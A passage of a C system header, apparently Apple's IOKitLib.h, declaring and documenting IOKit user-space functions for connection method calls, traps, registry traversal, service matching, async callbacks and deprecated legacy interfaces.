  const uint64_t    *input,            // In\n                         uint32_t     inputCnt,        // In\n                         const void    *inputStruct,        // In\n                         size_t         inputStructCnt,    // In\n                         uint64_t    *output,        // Out\n                         uint32_t    *outputCnt,        // In/Out\n                         void        *outputStruct,        // Out\n                         size_t        *outputStructCnt)    // In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\nkern_return_t\nIOConnectCallStructMethod(\n                          mach_port_t     connection,        // In\n                          uint32_t     selector,        // In\n                          const void    *inputStruct,        // In\n                          size_t         inputStructCnt,    // In\n                          void        *outputStruct,        // Out\n                          size_t        *outputStructCnt)    // In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\nkern_return_t\nIOConnectCallAsyncStructMethod(\n                               mach_port_t     connection,        // In\n                               uint32_t     selector,        // In\n                               mach_port_t     wake_port,        // In\n                               uint64_t    *reference,        // In\n                               uint32_t     referenceCnt,        // In\n                               const void    *inputStruct,        // In\n                               size_t         inputStructCnt,    // In\n                               void        *outputStruct,        // Out\n                               size_t        *outputStructCnt)    // In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\nkern_return_t\nIOConnectCallScalarMethod(\n                          mach_port_t     connection,        // In\n                          uint32_t     selector,        // In\n                          const 
uint64_t    *input,            // In\n                          uint32_t     inputCnt,        // In\n                          uint64_t    *output,        // Out\n                          uint32_t    *outputCnt)        // In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\nkern_return_t\nIOConnectCallAsyncScalarMethod(\n                               mach_port_t     connection,        // In\n                               uint32_t     selector,        // In\n                               mach_port_t     wake_port,        // In\n                               uint64_t    *reference,        // In\n                               uint32_t     referenceCnt,        // In\n                               const uint64_t    *input,            // In\n                               uint32_t     inputCnt,        // In\n                               uint64_t    *output,        // Out\n                               uint32_t    *outputCnt)        // In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\nkern_return_t\nIOConnectTrap0(io_connect_t    connect,\n               uint32_t        index );\n\nkern_return_t\nIOConnectTrap1(io_connect_t    connect,\n               uint32_t        index,\n               uintptr_t    p1 );\n\nkern_return_t\nIOConnectTrap2(io_connect_t    connect,\n               uint32_t        index,\n               uintptr_t    p1,\n               uintptr_t    p2);\n\nkern_return_t\nIOConnectTrap3(io_connect_t    connect,\n               uint32_t        index,\n               uintptr_t    p1,\n               uintptr_t    p2,\n               uintptr_t    p3);\n\nkern_return_t\nIOConnectTrap4(io_connect_t    connect,\n               uint32_t        index,\n               uintptr_t    p1,\n               uintptr_t    p2,\n               uintptr_t    p3,\n               uintptr_t    p4);\n\nkern_return_t\nIOConnectTrap5(io_connect_t    connect,\n               uint32_t        
index,\n               uintptr_t    p1,\n               uintptr_t    p2,\n               uintptr_t    p3,\n               uintptr_t    p4,\n               uintptr_t    p5);\n\nkern_return_t\nIOConnectTrap6(io_connect_t    connect,\n               uint32_t        index,\n               uintptr_t    p1,\n               uintptr_t    p2,\n               uintptr_t    p3,\n               uintptr_t    p4,\n               uintptr_t    p5,\n               uintptr_t    p6);\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*! @function IOConnectAddClient\n @abstract Inform a connection of a second connection.\n @discussion This is a generic method to inform a family connection of a second connection, and is rarely used.\n @param connect The connect handle created by IOServiceOpen.\n @param client Another connect handle created by IOServiceOpen.\n @result A kern_return_t error code returned by the family. */\n\nkern_return_t\nIOConnectAddClient(\n                   io_connect_t    connect,\n                   io_connect_t    client );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IORegistry accessors\n */\n\n/*! @function IORegistryGetRootEntry\n @abstract Return a handle to the registry root.\n @discussion This method provides an accessor to the root of the registry for the machine. The root may be passed to a registry iterator when iterating a plane, and contains properties that describe the available planes, and diagnostic information for IOKit.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @result A handle to the IORegistryEntry root instance, to be released with IOObjectRelease by the caller, or MACH_PORT_NULL on failure. */\n\nio_registry_entry_t\nIORegistryGetRootEntry(\n                       mach_port_t    masterPort );\n\n/*! 
@function IORegistryEntryFromPath\n @abstract Looks up a registry entry by path.\n @discussion This function parses paths to lookup registry entries. The path should begin with '<plane name>:' If there are characters remaining unparsed after an entry has been looked up, this is considered an invalid lookup. Paths are further documented in IORegistryEntry.h\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @param path A C-string path.\n @result A handle to the IORegistryEntry which was found with the path, to be released with IOObjectRelease by the caller, or MACH_PORT_NULL on failure. */\n\nio_registry_entry_t\nIORegistryEntryFromPath(\n                        mach_port_t        masterPort,\n                        const io_string_t    path );\n\n\n/*! @function IORegistryEntryFromPathCFString\n @abstract Looks up a registry entry by path.\n @discussion This function parses paths to lookup registry entries. The path should begin with '<plane name>:' If there are characters remaining unparsed after an entry has been looked up, this is considered an invalid lookup. Paths are further documented in IORegistryEntry.h\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @param path A CFString path.\n @result A handle to the IORegistryEntry which was found with the path, to be released with IOObjectRelease by the caller, or MACH_PORT_NULL on failure. 
*/\n\nio_registry_entry_t\nIORegistryEntryCopyFromPath(\n                            mach_port_t    masterPort,\n                            CFStringRef    path )\n#if defined(__MAC_10_11)\n__OSX_AVAILABLE_STARTING(__MAC_10_11, __IPHONE_9_0)\n#endif\n;\n\n// options for IORegistryCreateIterator(), IORegistryEntryCreateIterator, IORegistryEntrySearchCFProperty()\nenum {\n    kIORegistryIterateRecursively    = 0x00000001,\n    kIORegistryIterateParents        = 0x00000002\n};\n\n/*! @function IORegistryCreateIterator\n @abstract Create an iterator rooted at the registry root.\n @discussion This method creates an IORegistryIterator in the kernel that is set up with options to iterate children of the registry root entry, and to recurse automatically into entries as they are returned, or only when instructed with calls to IORegistryIteratorEnterEntry. The iterator object keeps track of entries that have been recursed into previously to avoid loops.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param options kIORegistryIterateRecursively may be set to recurse automatically into each entry as it is returned from IOIteratorNext calls on the registry iterator.\n @param iterator A created iterator handle, to be released by the caller when it has finished with it.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryCreateIterator(\n                         mach_port_t    masterPort,\n                         const io_name_t    plane,\n                         IOOptionBits    options,\n                         io_iterator_t * iterator );\n\n/*! 
@function IORegistryEntryCreateIterator\n @abstract Create an iterator rooted at a given registry entry.\n @discussion This method creates an IORegistryIterator in the kernel that is set up with options to iterate children or parents of a root entry, and to recurse automatically into entries as they are returned, or only when instructed with calls to IORegistryIteratorEnterEntry. The iterator object keeps track of entries that have been recursed into previously to avoid loops.\n @param entry The root entry to begin the iteration at.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param options kIORegistryIterateRecursively may be set to recurse automatically into each entry as it is returned from IOIteratorNext calls on the registry iterator. kIORegistryIterateParents may be set to iterate the parents of each entry, by default the children are iterated.\n @param iterator A created iterator handle, to be released by the caller when it has finished with it.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryCreateIterator(\n                              io_registry_entry_t    entry,\n                              const io_name_t        plane,\n                              IOOptionBits        options,\n                              io_iterator_t           * iterator );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IORegistryIterator, subclass of IOIterator\n */\n\n/*! @function IORegistryIteratorEnterEntry\n @abstract Recurse into the current entry in the registry iteration.\n @discussion This method makes the current entry, ie. the last entry returned by IOIteratorNext, the root in a new level of recursion.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryIteratorEnterEntry(\n                             io_iterator_t    iterator );\n\n/*! 
@function IORegistryIteratorExitEntry\n @abstract Exits a level of recursion, restoring the current entry.\n @discussion This method undoes an IORegistryIteratorEnterEntry, restoring the current entry. If there are no more levels of recursion to exit false is returned, otherwise true is returned.\n @result kIOReturnSuccess if a level of recursion was undone, kIOReturnNoDevice if no recursive levels are left in the iteration. */\n\nkern_return_t\nIORegistryIteratorExitEntry(\n                            io_iterator_t    iterator );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IORegistryEntry, subclass of IOObject\n */\n\n/*! @function IORegistryEntryGetName\n @abstract Returns a C-string name assigned to a registry entry.\n @discussion Registry entries can be named in a particular plane, or globally. This function returns the entry's global name. The global name defaults to the entry's meta class name if it has not been named.\n @param entry The registry entry handle whose name to look up.\n @param name The caller's buffer to receive the name.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetName(\n                       io_registry_entry_t    entry,\n                       io_name_t             name );\n\n/*! @function IORegistryEntryGetNameInPlane\n @abstract Returns a C-string name assigned to a registry entry, in a specified plane.\n @discussion Registry entries can be named in a particular plane, or globally. This function returns the entry's name in the specified plane or global name if it has not been named in that plane. The global name defaults to the entry's meta class name if it has not been named.\n @param entry The registry entry handle whose name to look up.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param name The caller's buffer to receive the name.\n @result A kern_return_t error code. 
*/\n\nkern_return_t\nIORegistryEntryGetNameInPlane(\n                              io_registry_entry_t    entry,\n                              const io_name_t     plane,\n                              io_name_t             name );\n\n/*! @function IORegistryEntryGetLocationInPlane\n @abstract Returns a C-string location assigned to a registry entry, in a specified plane.\n @discussion Registry entries can be given a location string in a particular plane, or globally. If the entry has had a location set in the specified plane that location string will be returned, otherwise the global location string is returned. If no global location string has been set, an error is returned.\n @param entry The registry entry handle whose location to look up.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param location The caller's buffer to receive the location string.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetLocationInPlane(\n                                  io_registry_entry_t    entry,\n                                  const io_name_t     plane,\n                                  io_name_t             location );\n\n/*! @function IORegistryEntryGetPath\n @abstract Create a path for a registry entry.\n @discussion The path for a registry entry is copied to the caller's buffer. The path describes the entry's attachment in a particular plane, which must be specified. The path begins with the plane name followed by a colon, and then followed by '/' separated path components for each of the entries between the root and the registry entry. An alias may also exist for the entry, and will be returned if available.\n @param entry The registry entry handle whose path to look up.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. 
kIOServicePlane.\n @param path A char buffer allocated by the caller.\n @result IORegistryEntryGetPath will fail if the entry is not attached in the plane, or if the buffer is not large enough to contain the path. */\n\nkern_return_t\nIORegistryEntryGetPath(\n                       io_registry_entry_t    entry,\n                       const io_name_t         plane,\n                       io_string_t        path );\n\n/*! @function IORegistryEntryCopyPath\n @abstract Create a path for a registry entry.\n @discussion The path for a registry entry is returned as a CFString The path describes the entry's attachment in a particular plane, which must be specified. The path begins with the plane name followed by a colon, and then followed by '/' separated path components for each of the entries between the root and the registry entry. An alias may also exist for the entry, and will be returned if available.\n @param entry The registry entry handle whose path to look up.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @result An instance of CFString on success, to be released by the caller. IORegistryEntryCopyPath will fail if the entry is not attached in the plane. */\n\nCFStringRef\nIORegistryEntryCopyPath(\n                        io_registry_entry_t    entry,\n                        const io_name_t         plane)\n#if defined(__MAC_10_11)\n__OSX_AVAILABLE_STARTING(__MAC_10_11, __IPHONE_9_0)\n#endif\n;\n\n/*! @function IORegistryEntryGetRegistryEntryID\n @abstract Returns an ID for the registry entry that is global to all tasks.\n @discussion The entry ID returned by IORegistryEntryGetRegistryEntryID can be used to identify a registry entry across all tasks. A registry entry may be looked up by its entryID by creating a matching dictionary with IORegistryEntryIDMatching() to be used with the IOKit matching functions. 
The ID is valid only until the machine reboots.\n @param entry The registry entry handle whose ID to look up.\n @param entryID The resulting ID.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetRegistryEntryID(\n                                  io_registry_entry_t    entry,\n                                  uint64_t *        entryID );\n\n/*! @function IORegistryEntryCreateCFProperties\n @abstract Create a CF dictionary representation of a registry entry's property table.\n @discussion This function creates an instantaneous snapshot of a registry entry's property table, creating a CFDictionary analogue in the caller's task. Not every object available in the kernel is represented as a CF container; currently OSDictionary, OSArray, OSSet, OSSymbol, OSString, OSData, OSNumber, OSBoolean are created as their CF counterparts.\n @param entry The registry entry handle whose property table to copy.\n @param properties A CFDictionary is created and returned the caller on success. The caller should release with CFRelease.\n @param allocator The CF allocator to use when creating the CF containers.\n @param options No options are currently defined.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryCreateCFProperties(\n                                  io_registry_entry_t    entry,\n                                  CFMutableDictionaryRef * properties,\n                                  CFAllocatorRef        allocator,\n                                  IOOptionBits        options );\n\n/*! @function IORegistryEntryCreateCFProperty\n @abstract Create a CF representation of a registry entry's property.\n @discussion This function creates an instantaneous snapshot of a registry entry property, creating a CF container analogue in the caller's task. 
Not every object available in the kernel is represented as a CF container; currently OSDictionary, OSArray, OSSet, OSSymbol, OSString, OSData, OSNumber, OSBoolean are created as their CF counterparts.\n @param entry The registry entry handle whose property to copy.\n @param key A CFString specifying the property name.\n @param allocator The CF allocator to use when creating the CF container.\n @param options No options are currently defined.\n @result A CF container is created and returned to the caller on success. The caller should release with CFRelease. */\n\nCFTypeRef\nIORegistryEntryCreateCFProperty(\n                                io_registry_entry_t    entry,\n                                CFStringRef        key,\n                                CFAllocatorRef        allocator,\n                                IOOptionBits        options );\n\n/*! @function IORegistryEntrySearchCFProperty\n @abstract Create a CF representation of a registry entry's property.\n @discussion This function creates an instantaneous snapshot of a registry entry property, creating a CF container analogue in the caller's task. Not every object available in the kernel is represented as a CF container; currently OSDictionary, OSArray, OSSet, OSSymbol, OSString, OSData, OSNumber, OSBoolean are created as their CF counterparts.\n This function will search for a property, starting first with the specified registry entry's property table, then iterating recursively through either the parent registry entries or the child registry entries of this entry. Once the first occurrence is found, it will look up and return the value of the property, using the same semantics as IORegistryEntryCreateCFProperty. The iteration keeps track of entries that have been recursed into previously to avoid loops.\n @param entry The registry entry at which to start the search.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. 
kIOServicePlane.\n @param key A CFString specifying the property name.\n @param allocator The CF allocator to use when creating the CF container.\n @param options kIORegistryIterateRecursively may be set to recurse automatically into the registry hierarchy. Without this option, this method degenerates into the standard IORegistryEntryCreateCFProperty() call. kIORegistryIterateParents may be set to iterate the parents of the entry, in place of the children.\n @result A CF container is created and returned the caller on success. The caller should release with CFRelease. */\n\nCFTypeRef\nIORegistryEntrySearchCFProperty(\n                                io_registry_entry_t    entry,\n                                const io_name_t        plane,\n                                CFStringRef        key,\n                                CFAllocatorRef        allocator,\n                                IOOptionBits        options ) CF_RETURNS_RETAINED;\n\n/*  @function IORegistryEntryGetProperty - deprecated,\n use IORegistryEntryCreateCFProperty */\n\nkern_return_t\nIORegistryEntryGetProperty(\n                           io_registry_entry_t    entry,\n                           const io_name_t        propertyName,\n                           io_struct_inband_t    buffer,\n                           uint32_t          * size );\n\n/*! @function IORegistryEntrySetCFProperties\n @abstract Set CF container based properties in a registry entry.\n @discussion This is a generic method to pass a CF container of properties to an object in the registry. Setting properties in a registry entry is not generally supported, it is more common to support IOConnectSetCFProperties for connection based property setting. The properties are interpreted by the object.\n @param entry The registry entry whose properties to set.\n @param properties A CF container - commonly a CFDictionary but this is not enforced. 
The container should consist of objects which are understood by IOKit - these are currently : CFDictionary, CFArray, CFSet, CFString, CFData, CFNumber, CFBoolean, and are passed in the kernel as the corresponding OSDictionary etc. objects.\n @result A kern_return_t error code returned by the object. */\n\nkern_return_t\nIORegistryEntrySetCFProperties(\n                               io_registry_entry_t    entry,\n                               CFTypeRef         properties );\n\n/*! @function IORegistryEntrySetCFProperty\n @abstract Set a CF container based property in a registry entry.\n @discussion This is a generic method to pass a CF container as a property to an object in the registry. Setting properties in a registry entry is not generally supported, it is more common to support IOConnectSetCFProperty for connection based property setting. The property is interpreted by the object.\n @param entry The registry entry whose property to set.\n @param propertyName The name of the property as a CFString.\n @param property A CF container - should consist of objects which are understood by IOKit - these are currently : CFDictionary, CFArray, CFSet, CFString, CFData, CFNumber, CFBoolean, and are passed in the kernel as the corresponding OSDictionary etc. objects.\n @result A kern_return_t error code returned by the object. */\n\nkern_return_t\nIORegistryEntrySetCFProperty(\n                             io_registry_entry_t    entry,\n                             CFStringRef        propertyName,\n                             CFTypeRef         property );\n\n/*! @function IORegistryEntryGetChildIterator\n @abstract Returns an iterator over a registry entry's child entries in a plane.\n @discussion This method creates an iterator which will return each of a registry entry's child entries in a specified plane.\n @param entry The registry entry whose children to iterate over.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. 
kIOServicePlane.\n @param iterator The created iterator over the children of the entry, on success. The iterator must be released when the iteration is finished.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetChildIterator(\n                                io_registry_entry_t    entry,\n                                const io_name_t        plane,\n                                io_iterator_t          * iterator );\n\n/*! @function IORegistryEntryGetChildEntry\n @abstract Returns the first child of a registry entry in a plane.\n @discussion This function will return the child which first attached to a registry entry in a plane.\n @param entry The registry entry whose child to look up.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param child The first child of the registry entry, on success. The child must be released by the caller.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetChildEntry(\n                             io_registry_entry_t    entry,\n                             const io_name_t        plane,\n                             io_registry_entry_t   * child );\n\n/*! @function IORegistryEntryGetParentIterator\n @abstract Returns an iterator over a registry entry's parent entries in a plane.\n @discussion This method creates an iterator which will return each of a registry entry's parent entries in a specified plane.\n @param entry The registry entry whose parents to iterate over.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param iterator The created iterator over the parents of the entry, on success. The iterator must be released when the iteration is finished.\n @result A kern_return_t error code. 
*/\n\nkern_return_t\nIORegistryEntryGetParentIterator(\n                                 io_registry_entry_t    entry,\n                                 const io_name_t        plane,\n                                 io_iterator_t          * iterator );\n\n/*! @function IORegistryEntryGetParentEntry\n @abstract Returns the first parent of a registry entry in a plane.\n @discussion This function will return the parent to which the registry entry was first attached in a plane.\n @param entry The registry entry whose parent to look up.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param parent The first parent of the registry entry, on success. The parent must be released by the caller.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetParentEntry(\n                              io_registry_entry_t    entry,\n                              const io_name_t        plane,\n                              io_registry_entry_t   * parent );\n\n/*! @function IORegistryEntryInPlane\n @abstract Determines if the registry entry is attached in a plane.\n @discussion This method determines if the entry is attached in a plane to any other entry.\n @param entry The registry entry.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @result If the entry has a parent in the plane, true is returned, otherwise false is returned. */\n\nboolean_t\nIORegistryEntryInPlane(\n                       io_registry_entry_t    entry,\n                       const io_name_t        plane );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * Matching dictionary creation helpers\n */\n\n/*! @function IOServiceMatching\n @abstract Create a matching dictionary that specifies an IOService class match.\n @discussion A very common matching criteria for IOService is based on its class. 
IOServiceMatching will create a matching dictionary that specifies any IOService of a class, or its subclasses. The class is specified by C-string name.\n @param name The class name, as a const C-string. Class matching is successful on IOService's of this class or any subclass.\n @result The matching dictionary created, is returned on success, or zero on failure. The dictionary is commonly passed to IOServiceGetMatchingServices or IOServiceAddNotification which will consume a reference, otherwise it should be released with CFRelease by the caller. */\n\nCFMutableDictionaryRef\nIOServiceMatching(\n                  const char *    name ) CF_RETURNS_RETAINED;\n\n/*! @function IOServiceNameMatching\n @abstract Create a matching dictionary that specifies an IOService name match.\n @discussion A common matching criteria for IOService is based on its name. IOServiceNameMatching will create a matching dictionary that specifies an IOService with a given name. Some IOServices created from the device tree will perform name matching on the standard compatible, name, model properties.\n @param name The IOService name, as a const C-string.\n @result The matching dictionary created, is returned on success, or zero on failure. The dictionary is commonly passed to IOServiceGetMatchingServices or IOServiceAddNotification which will consume a reference, otherwise it should be released with CFRelease by the caller. */\n\nCFMutableDictionaryRef\nIOServiceNameMatching(\n                      const char *    name ) CF_RETURNS_RETAINED;\n\n/*! @function IOBSDNameMatching\n @abstract Create a matching dictionary that specifies an IOService match based on BSD device name.\n @discussion IOServices that represent BSD devices have an associated BSD name. This function creates a matching dictionary that will match IOService's with a given BSD name.\n @param masterPort The master port obtained from IOMasterPort(). 
Pass kIOMasterPortDefault to look up the default master port.\n @param options No options are currently defined.\n @param bsdName The BSD name, as a const char *.\n @result The matching dictionary created, is returned on success, or zero on failure. The dictionary is commonly passed to IOServiceGetMatchingServices or IOServiceAddNotification which will consume a reference, otherwise it should be released with CFRelease by the caller. */\n\nCFMutableDictionaryRef\nIOBSDNameMatching(\n                  mach_port_t    masterPort,\n                  uint32_t    options,\n                  const char *    bsdName ) CF_RETURNS_RETAINED;\n\nCFMutableDictionaryRef\nIOOpenFirmwarePathMatching(\n                           mach_port_t    masterPort,\n                           uint32_t    options,\n                           const char *    path ) DEPRECATED_ATTRIBUTE;\n\n/*! @function IORegistryEntryIDMatching\n @abstract Create a matching dictionary that specifies an IOService match based on a registry entry ID.\n @discussion This function creates a matching dictionary that will match a registered, active IOService found with the given registry entry ID. The entry ID for a registry entry is returned by IORegistryEntryGetRegistryEntryID().\n @param entryID The registry entry ID to be found.\n @result The matching dictionary created, is returned on success, or zero on failure. The dictionary is commonly passed to IOServiceGetMatchingServices or IOServiceAddNotification which will consume a reference, otherwise it should be released with CFRelease by the caller. 
*/\n\nCFMutableDictionaryRef\nIORegistryEntryIDMatching(\n                          uint64_t    entryID ) CF_RETURNS_RETAINED;\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\nkern_return_t\nIOServiceOFPathToBSDName(mach_port_t        masterPort,\n                         const io_name_t    openFirmwarePath,\n                         io_name_t        bsdName) DEPRECATED_ATTRIBUTE;\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*! @typedef IOAsyncCallback0\n @abstract standard callback function for asynchronous I/O requests with\n no extra arguments beyond a refcon and result code.\n @param refcon The refcon passed into the original I/O request\n @param result The result of the I/O operation\n */\ntypedef void (*IOAsyncCallback0)(void *refcon, IOReturn result);\n\n/*! @typedef IOAsyncCallback1\n @abstract standard callback function for asynchronous I/O requests with\n one extra argument beyond a refcon and result code.\n This is often a count of the number of bytes transferred\n @param refcon The refcon passed into the original I/O request\n @param result The result of the I/O operation\n @param arg0    Extra argument\n */\ntypedef void (*IOAsyncCallback1)(void *refcon, IOReturn result, void *arg0);\n\n/*! @typedef IOAsyncCallback2\n @abstract standard callback function for asynchronous I/O requests with\n two extra arguments beyond a refcon and result code.\n @param refcon The refcon passed into the original I/O request\n @param result The result of the I/O operation\n @param arg0    Extra argument\n @param arg1    Extra argument\n */\ntypedef void (*IOAsyncCallback2)(void *refcon, IOReturn result, void *arg0, void *arg1);\n\n/*! 
@typedef IOAsyncCallback\n @abstract standard callback function for asynchronous I/O requests with\n lots of extra arguments beyond a refcon and result code.\n @param refcon The refcon passed into the original I/O request\n @param result The result of the I/O operation\n @param args    Array of extra arguments\n @param numArgs Number of extra arguments\n */\ntypedef void (*IOAsyncCallback)(void *refcon, IOReturn result, void **args,\n                                uint32_t numArgs);\n\n\n/* Internal use */\n\nkern_return_t\nOSGetNotificationFromMessage(\n                             mach_msg_header_t     * msg,\n                             uint32_t          index,\n                             uint32_t              * type,\n                             uintptr_t          * reference,\n                             void             ** content,\n                             vm_size_t          * size );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/* Internal use */\n\nkern_return_t\nIOCatalogueSendData(\n                    mach_port_t             masterPort,\n                    uint32_t                flag,\n                    const char             *buffer,\n                    uint32_t                size );\n\nkern_return_t\nIOCatalogueTerminate(\n                     mach_port_t        masterPort,\n                     uint32_t                flag,\n                     io_name_t        description );\n\nkern_return_t\nIOCatalogueGetData(\n                   mach_port_t             masterPort,\n                   uint32_t                flag,\n                   char                  **buffer,\n                   uint32_t               *size );\n\nkern_return_t\nIOCatalogueModuleLoaded(\n                        mach_port_t             masterPort,\n                        io_name_t               name );\n\n/* Use IOCatalogueSendData(), with kIOCatalogResetDrivers, to replace catalogue\n * rather than emptying it. 
Doing so keeps instance counts down by uniquing\n * existing personalities.\n */\nkern_return_t\nIOCatalogueReset(\n                 mach_port_t             masterPort,\n                 uint32_t                flag );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n// obsolete API\n\n#if !defined(__LP64__)\n\n// for Power Mgt\n\ntypedef struct IOObject IOObject;\n\n// for MacOS.app\n\nkern_return_t\nIORegistryDisposeEnumerator(\n                            io_enumerator_t    enumerator ) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nIOMapMemory(\n            io_connect_t    connect,\n            uint32_t    memoryType,\n            task_port_t    intoTask,\n            vm_address_t *    atAddress,\n            vm_size_t    *    ofSize,\n            uint32_t    flags ) DEPRECATED_ATTRIBUTE;\n\n// for CGS\n\nkern_return_t\nIOCompatibiltyNumber(\n                     mach_port_t    connect,\n                     uint32_t *    objectNumber ) DEPRECATED_ATTRIBUTE;\n\n// Traditional IOUserClient transport routines\nkern_return_t\nIOConnectMethodScalarIScalarO(\n                              io_connect_t    connect,\n                              uint32_t    index,\n                              IOItemCount    scalarInputCount,\n                              IOItemCount    scalarOutputCount,\n                              ... ) AVAILABLE_MAC_OS_X_VERSION_10_0_AND_LATER_BUT_DEPRECATED_IN_MAC_OS_X_VERSION_10_5;\n\nkern_return_t\nIOConnectMethodScalarIStructureO(\n                                 io_connect_t    connect,\n                                 uint32_t    index,\n                                 IOItemCount    scalarInputCount,\n                                 IOByteCount *    structureSize,\n                                 ... 
) AVAILABLE_MAC_OS_X_VERSION_10_0_AND_LATER_BUT_DEPRECATED_IN_MAC_OS_X_VERSION_10_5;\n\nkern_return_t\nIOConnectMethodScalarIStructureI(\n                                 io_connect_t    connect,\n                                 uint32_t    index,\n                                 IOItemCount    scalarInputCount,\n                                 IOByteCount    structureSize,\n                                 ... ) AVAILABLE_MAC_OS_X_VERSION_10_0_AND_LATER_BUT_DEPRECATED_IN_MAC_OS_X_VERSION_10_5;\n\nkern_return_t\nIOConnectMethodStructureIStructureO(\n                                    io_connect_t    connect,\n                                    uint32_t    index,\n                                    IOItemCount    structureInputSize,\n                                    IOByteCount *    structureOutputSize,\n                                    void *        inputStructure,\n                                    void *        ouputStructure ) AVAILABLE_MAC_OS_X_VERSION_10_0_AND_LATER_BUT_DEPRECATED_IN_MAC_OS_X_VERSION_10_5;\n\n// Compatability with earlier Mig interface routines\n#if IOCONNECT_NO_32B_METHODS\n\nkern_return_t\nio_connect_map_memory(\n                      io_connect_t        connect,\n                      uint32_t        memoryType,\n                      task_port_t        intoTask,\n                      vm_address_t        *atAddress,\n                      vm_size_t        *ofSize,\n                      IOOptionBits        options) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_connect_unmap_memory(\n                        io_connect_t        connect,\n                        uint32_t        memoryType,\n                        task_port_t        fromTask,\n                        vm_address_t        atAddress) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_connect_method_scalarI_scalarO(\n                                  mach_port_t connection,\n                                  int selector,\n                                  io_scalar_inband_t 
input,\n                                  mach_msg_type_number_t inputCnt,\n                                  io_scalar_inband_t output,\n                                  mach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_connect_method_scalarI_structureO(\n                                     mach_port_t connection,\n                                     int selector,\n                                     io_scalar_inband_t input,\n                                     mach_msg_type_number_t inputCnt,\n                                     io_struct_inband_t output,\n                                     mach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_connect_method_scalarI_structureI(\n                                     mach_port_t connection,\n                                     int selector,\n                                     io_scalar_inband_t input,\n                                     mach_msg_type_number_t inputCnt,\n                                     io_struct_inband_t inputStruct,\n                                     mach_msg_type_number_t inputStructCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_connect_method_structureI_structureO(\n                                        mach_port_t connection,\n                                        int selector,\n                                        io_struct_inband_t input,\n                                        mach_msg_type_number_t inputCnt,\n                                        io_struct_inband_t output,\n                                        mach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_async_method_scalarI_scalarO(\n                                mach_port_t connection,\n                                mach_port_t wake_port,\n                                io_async_ref_t reference,\n                                mach_msg_type_number_t referenceCnt,\n                                int selector,\n     
